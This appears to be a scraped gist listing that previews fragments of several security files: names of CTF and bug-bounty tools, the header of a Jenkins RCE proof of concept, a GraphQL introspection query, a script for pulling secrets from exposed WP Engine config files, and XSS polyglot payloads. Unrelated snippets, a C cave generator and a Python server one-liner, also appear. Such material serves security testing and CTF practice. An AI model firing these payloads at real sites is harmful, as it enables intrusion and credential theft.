image_extract.py
performs character extraction on targetted against the HackerOne H1-702 CTF announcement imagedecrypt_sqli.py
performs blind sqli data extraction with encrypted payloads targetting against the FliteThermostat APItiming_attack.py
performs an HTTP piplining based timing against the FliteThermostat Backendwordlist_generator.py
generates wordlists from a give corpus or set of corpuseshttplib.py
performs efficient asynchronous HTTP requests against the FliteThermostat Backend
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <time.h> // Robert Nystrom | |
#include <stdio.h> // @munificentbob | |
#include <stdlib.h> // for Ginny | |
#define r return // 2008-2019 | |
#define l(a, b, c, d) for (i y=a;y\ | |
<b; y++) for (int x = c; x < d; x++) | |
typedef int i;const i H=40;const i W | |
=80;i m[40][80];i g(i x){r rand()%x; | |
}void cave(i s){i w=g(10)+5;i h=g(6) | |
+3;i t=g(W-w-2)+1;i u=g(H-h-2)+1;l(u |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Author: Adam Jordan | |
# Date: 2019-02-15 | |
# Repository: https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc | |
# PoC for: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative) | |
import argparse | |
import jenkins |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
%0A%20%20query%20IntrospectionQuery%20%7B%0A%20%20%20%20__schema%20%7B%0A%20%20%20%20%20%20queryType%20%7B%20name%20%7D%0A%20%20%20%20%20%20mutationType%20%7B%20name%20%7D%0A%20%20%20%20%20%20subscriptionType%20%7B%20name%20%7D%0A%20%20%20%20%20%20types%20%7B%0A%20%20%20%20%20%20%20%20...FullType%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20directives%20%7B%0A%20%20%20%20%20%20%20%20name%0A%20%20%20%20%20%20%20%20description%0A%20%20%20%20%20%20%20%20locations%0A%20%20%20%20%20%20%20%20args%20%7B%0A%20%20%20%20%20%20%20%20%20%20...InputValue%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%20%20%7D%0A%0A%20%20fragment%20FullType%20on%20__Type%20%7B%0A%20%20%20%20kind%0A%20%20%20%20name%0A%20%20%20%20description%0A%20%20%20%20fields(includeDeprecated%3A%20true)%20%7B%0A%20%20%20%20%20%20name%0A%20%20%20%20%20%20description%0A%20%20%20%20%20%20args%20%7B%0A%20%20%20%20%20%20%20%20...InputValue%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20type%20%7B%0A%20%20%20%20%20%20%20%20...TypeRef%0A |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# If you find a site with /_wpeprivate/config.json file exposed, run this and get all kinds of fun goodies. | |
# If it "no worked" (Technical Term) then you probably need to install jq! | |
TARGET=$1 | |
TARGETDOMAIN=$(echo $TARGET | cut -d/ -f3) | |
# Pretty Colors | |
RESET='\033[00m' | |
GREEN='\033[01;32m' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e | |
javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/* | |
javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert(123)//>*/alert()/*<img src=x onerror=alert(456)/><svg/onload=prompt(789)/>;'"// :;fn();%0a%0d\n\r\t{{12*12+'Audi RS5'.substr(0,4)}}XXX<script>alert('XSS') | |
javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert(123)//>*/alert()/* | |
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<title>Redirection</title> | |
</head> | |
<body> | |
</div> | |
<script> | |
// imagine that read url from GET parameter routine goes here... | |
// but we just hardcode it for now :) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<title>Dynamic P Application</title> | |
<style> | |
* { | |
font-size:18px; | |
font-weight:bold; | |
color: #2e2e2e; | |
} | |
</style> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<title>Move along, nothing to see here!</title> | |
<style> | |
/* note to myself: add CSS from Bob's repo: https://verysecurecompany.com/__internal__/repo/bob/specs.git */ | |
* { | |
font-size:16px; | |
color: #c0c0c0; | |
} | |
</style> |
Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000